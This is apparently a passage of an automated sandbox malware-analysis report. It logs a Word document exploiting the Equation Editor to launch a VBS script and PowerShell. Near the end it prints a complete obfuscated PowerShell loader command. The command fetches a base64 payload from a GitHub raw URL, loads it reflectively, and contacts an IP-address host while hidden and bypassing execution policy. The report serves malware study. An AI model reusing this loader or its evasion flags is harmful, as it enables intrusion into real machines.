Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1948Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 595Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4734Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2142Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3364Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 4734 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 2142 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3724Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -2400000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000005.00000003.364824207.0000000002436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .iTGKrAptRpoRCHpvmcibhkZKPoWcGKcfGGGziczQkiorZp <
Source: newprojectwithnewthingstobecome[1].tiff.2.drBinary or memory string: iTGKrAptRpoRCHpvmcibhkZKPoWcGKcfGGGziczQkiorZp = "hxqULmmpUmKLWLcZmocWbCkLoLLzZocKKPLmrWiikmALWt"
Source: newprojectwithnewthingstobecome[1].tiff.2.drBinary or memory string: NtbmzhKcdCKkUfpWLqLAImUkGilrHdlaGLOLinbiancTUb = "iLRUqAhmUOicaoLcNJLGzcvmCiPWKTqoOfKbWLejTlPieo"
Source: wscript.exe, 00000005.00000003.365146380.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]\iTGKrAptRpoRCHpvmcibhkZKPoWcGKcfGGGziczQkiorZp<di
Source: wscript.exe, 00000005.00000003.364824207.0000000002436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .iLRUqAhmUOicaoLcNJLGzcvmCiPWKTqoOfKbWLejTlPieos
Source: wscript.exe, 00000005.00000003.365674594.0000000000929000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iLRUqAhmUOicaoLcNJLGzcvmCiPWKTqoOfKbWLejTlPieo
Source: wscript.exe, 00000005.00000002.367743724.0000000002467000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iTGKrAptRpoRCHpvmcibhkZKPoWcGKcfGGGziczQkiorZp6
Source: wscript.exe, 00000005.00000003.365146380.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i\iLRUqAhmUOicaoLcNJLGzcvmCiPWKTqoOfKbWLejTlPieoT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
